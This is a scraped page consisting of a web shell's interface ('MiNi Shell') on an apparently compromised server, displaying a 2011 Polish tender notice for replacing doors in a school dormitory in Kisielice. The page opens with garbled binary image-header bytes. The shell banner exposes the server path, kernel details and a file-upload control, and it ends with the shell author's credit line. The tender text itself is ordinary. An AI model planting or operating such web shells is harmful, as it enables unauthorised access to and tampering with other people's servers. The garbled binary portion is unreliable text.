JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20111121/388896-N-2011.html

<p class="kh_header"><b>Kisielice: Wymiana stolarki drzwiowej w internacie Zespołu Szkół Rolniczych w Kisielicach</b><br>
<b>Numer ogłoszenia: 388896 - 2011; data zamieszczenia: 21.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Rolniczych im. Heleny i Stanisława Sierakowskich w Kisielicach , ul. Daszyńskiego 12, 14-220 Kisielice, woj. warmińsko-mazurskie, tel. 0-55 275 60 30, faks 0-55 275 60 30.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zsr-kisielice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Powiatowa Samorządowa Jednostka Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana stolarki drzwiowej w internacie Zespołu Szkół Rolniczych w Kisielicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych związanych z wymianą i osadzeniem stolarki drzwiowej i ościeżnic  oraz narożników aluminiowych w otworach drzwiowych w Internacie Zespołu Szkół Rolniczych w Kisielicach. Zakres robót obejmuje: 
1.Wymianę stolarki  drzwiowej I piętro polegająca na :
a)zabezpieczeniu miejsc objętych opracowaniem-remontem od osób trzecich zgodnie z wytycznymi dla budynków nie wyłączonych z użytkowania a objętych opracowaniem;
b)demontaż stolarki drzwiowej (drzwi i ościeżnic ) krotność = 1,00; 
c)zakupienie, transport i montaż nowej stolarki drzwiowej wraz z kompletem okuć i z zamkiem patentowym; 
d)skrzydła drzwiowe płytowe wewnętrzne, wewnątrzlokalowe jednodzielne o powierzchni 160m2, fabrycznie wykończone - drzwi wewnętrzne, Dw 80*200 cm -  19 szt. Krotność = 1,00    lub równoważne; 
e)drzwi powinny być takie, by możliwa była całkowita ich dezynfekcja.
f)Wywiezienie gruzu samochodami samowyładowczymi z demontażu drzwi i ościeżnic na odległość 1 km ,  Krotność = 1,00 ;
g)oczyszczenie pomieszczeń po pracach wyburzeniowych, rozbiórkowych i demontażowych.
2. Wymiana stolarki drzwiowej II piętro polegająca na:
a)zabezpieczeniu miejsc objętych opracowaniem-remontem od osób trzecich zgodnie z wytycznymi dla budynków nie wyłączonych z użytkowania a objętych opracowaniem;
b)demontaż stolarki drzwiowej (drzwi i ościeżnic ) krotność = 1,00; 
c)zakupienie, transport i montaż nowej stolarki drzwiowej wraz z kompletem okuć i z zamkiem patentowym; 
d)skrzydła drzwiowe płytowe wewnętrzne, wewnątrzlokalowe jednodzielne o powierzchni 160m2, fabrycznie wykończone - drzwi wewnętrzne, Dw 80*200 cm -  19 szt., 70*200 cm - 4 szt. Krotność = 1,00    lub równoważne; 
e)drzwi powinny być takie, by możliwa była całkowita ich dezynfekcja.
f)Wywiezienie gruzu samochodami samowyładowczymi z demontażu drzwi i ościeżnic na odległość 1 km ,  Krotność = 1,00 ;
g)oczyszczenie pomieszczeń po pracach wyburzeniowych, rozbiórkowych i  
demontażowych.
Szczegółowy zakres przedmiotu zamówienia określa dokumentacja projektowa: kosztorys, specyfikacje techniczne wykonania i odbioru robót budowlanych :S.T. 1.0 , ST.1.1 , ST. 1.2 ,rysunek poglądowy oraz pomocniczo przedmiar robót stanowiące załączniki do SIWZ. Zamawiający wymaga udzielenia gwarancji jakości na wykonany przedmiot zamówienia na okres 36 miesięcy. Okres gwarancji liczony jest od dnia dokonania odbioru końcowego. Wykonawca wykona przedmiot zamówienia z materiałów własnych nabytych w uzgodnieniu z Zamawiającym. Wszystkie materiały i wyroby wykorzystane przy realizacji zamówienia muszą być dopuszczone do obrotu i stosowania w budownictwie, posiadać wymagane certyfikaty, aprobaty techniczne, deklaracje zgodności z PN oraz muszą być zgodne z wymaganiami określonymi w dokumentacji projektowej stanowiącej załącznik do SIWZ. Roboty budowlane należy prowadzić z zachowaniem wymaganych norm i przepisów w sprawie bezpieczeństwa i higieny pracy, ochrony środowiska, zgodnie z zasadami wiedzy technicznej i sztuki budowlanej, polskimi normami oraz pokazaną dokumentacją. Wykonawca zabezpieczy maszyny i narzędzia niezbędne do wykonania zadania. Zaleca się by Wykonawca dokonał wizji lokalnej na terenie, gdzie mają być prowadzone roboty objęte przedmiotem zamówienia. Zamawiający informuje, że na etapie składania ofert nie żąda przedłożenia  kosztorysu szczegółowego. Przedmiotowy kosztorys  szczegółowy wybrany Wykonawca będzie zobowiązany przedłożyć przed podpisaniem umowy. Zadnie realizowane będzie w budynku należącym do Zamawiającego, ul. Daszyńskiego 12, 14 - 220 Kisielice. W trakcie wykonywania robót budynek będzie użytkowany. Zamawiający żąda wskazania w ofercie części zamówienia która zostanie powierzona podwykonawcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.11.00-9, 45.11.12.20-6, 45.21.00.00-4, 45.21.50.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania Wykonawca składa oświadczenie o spełnieniu warunku zgodnie z wzorem stanowiącym załącznik Nr 1 do formularza ofertowego. Ocena spełniania warunku zostanie dokonana na podstawie złożonego oświadczenia o spełnieniu warunku o którym mowa powyżej.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie posiadania wiedzy i doświadczenia Zamawiający żąda by Wykonawca wykazał, iż wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy w tym okresie co najmniej jedno zadanie polegające wykonaniu wymiany stolarki drzwiowej z ościeżnicami (demontaż starej i osadzenie nowej) oraz złoży oświadczenie, że dysponuje wiedzą i doświadczeniem potrzebnym do wykonania zamówienia. Ocena spełnienia warunku zostanie dokonana na podstawie złożonego przez Wykonawcę wypełnionego formularza doświadczenia zawodowe, którego wzór stanowi załącznik Nr 4 do formularza ofertowego, dokumentów potwierdzających że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone oraz oświadczenia o spełnieniu warunku o którym mowa powyżej zgodnie z wzorem Nr 1 do formularza ofertowego.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku dysponowania odpowiednim potencjałem technicznym Wykonawca składa oświadczenie o spełnieniu warunku zgodnie z wzorem stanowiącym załącznik Nr 1 do formularza ofertowego. Ocena spełniania warunku zostanie dokonana na podstawie złożonego oświadczenia o spełnieniu warunku 
o którym mowa powyżej.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku dysponowania osobami zdolnymi do wykonania zmówienia Wykonawca wykaże, iż dysponuje: a) minimum jedną osobą posiadającą uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych 
w budownictwie w specjalności konstrukcyjno - budowlanej bez ograniczeń lub inne uprawnienia uprawniające do wykonywania tych samych czynności, do wykonania których w aktualnym stanie prawnym uprawniają uprawnienia budowlane ww. specjalności b) minimum jedną osobą posiadającą uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych w budownictwie w specjalności osadzania  drzwi i ościeżnic, lub inne uprawnienia uprawniające do wykonywania tych samych czynności, do wykonania których w aktualnym stanie prawnym uprawniają uprawnienia budowlane ww. specjalności oraz złoży oświadczenie o spełnieniu warunku zgodnie z załącznikiem Nr 1 do formularza ofertowego. Weryfikacja spełniania tego warunku dokonana zostanie na podstawie wypełnionego formularza stanowiącego załącznik Nr 5 do formularza ofertowego oraz złożonego oświadczenia o spełnieniu warunku zgodnie z wzorem stanowiącym załącznik Nr 1 do formularza ofertowego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia dla uznania, że Wykonawca spełnia warunek Zamawiający żąda, by Wykonawca złożył oświadczenie o spełnieniu warunku zgodnie z załącznikiem Nr 1 do formularza ofertowego. Ocena spełniania warunku nastąpi na podstawie załączonego do oferty oświadczenia o spełnieniu warunku, o którym mowa powyżej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy - zgodny z załącznikiem Nr 1 do SIWZ; 2. Pisemne zobowiązanie innych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, zgodnie z wzorem stanowiącym załącznik Nr 3 do formularza ofertowego; 3. Specyfikacja techniczna/karta katalogowa planowanych do zastosowania materiałów równoważnych - składana tylko w przypadku zastosowania materiałów równoważnych do opisywanych w dokumentacji projektowej za pomocą znaków towarowych;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach:
1.termin realizacji zamówienia ulegnie zmianie jeżeli:
a) wystąpią roboty zamienne polegające na zastosowaniu innej technologii wykonania przedmiotu zamówienia lub materiałów niezbędnych do wykonania zamówienia, które okażą się korzystniejsze ze względu na ekonomikę, czas realizacji, ekologię, trwałość elementów, estetykę lub funkcjonalność. Zmiana inicjowana przez Wykonawcę wymaga złożenia wniosku wraz z uzasadnieniem oraz opisem wpływu zmiany na termin wykonania umowy. Jeżeli zmiana zostanie zainicjowana przez Zamawiającego - powiadomi on Wykonawcę o zmianie na piśmie celem akceptacji zmiany z prośbą o wskazanie jej wpływu na termin realizacji;
b) wystąpią roboty dodatkowe określone w art. 67 ust. 1 pkt. 5 ustawy prawo zamówień publicznych;

c) zmienią się powszechnie obowiązujące przepisy prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia. Strona inicjująca zmianę wskaże na piśmie zakres zmian wynikający ze zmian przepisów prawa oraz ich wpływ na terminową realizację przedmiotu zamówienia.  
2. Jeżeli w trakcie realizacji umowy Wykonawca złoży oświadczenie o zaprzestaniu realizacji przez podwykonawcę niniejszej umowy zmianie ulegnie umowa w zakresie podwykonawcy. W takiej sytuacji Wykonawca zobowiązany jest przedłożyć Zamawiającemu do akceptacji projekt umowy z nowym podwykonawcą.
3. Jeżeli w trakcie realizacji umowy Wykonawca złoży oświadczenie o zmianie zakresu prac powierzonych podwykonawcy zmianie ulegnie zakres prac powierzonych podwykonawcy.  
4.Jeżeli zmienią się osoby posiadające odpowiednie uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych w budownictwie wymienionych w ofercie Wykonawca poinformuje o tym fakcie Zamawiającego na piśmie w terminie 3 dni od wystąpienia zmiany wskazując z imienia i nazwiska nowego kierownika robót oraz podając powody zmiany. Przy czym osoba winna posiadać kwalifikacje, doświadczenie oraz uprawnienia zawodowe co najmniej takie jakich żądał Zamawiający w SIWZ. Wykonawca na potwierdzenie posiadania uprawnień złoży zaświadczenie właściwego podmiotu o nadaniu stosownych uprawnień. Zamawiający musi wyrazić zgodę na zmianę ww. osoby. 
4. Po zaakceptowaniu przez strony zmian wymienionych w pkt. 16.3. zawarty zostanie aneks do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zsr-kisielice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Rolniczych
ul. Daszyńskiego 12
14-220 Kisielice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.12.2011 godzina 09:00, miejsce: Zespół Szkół Rolniczych w Kisielicach, ul. Daszyńskiego 12 - sekretariat (na parterze)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com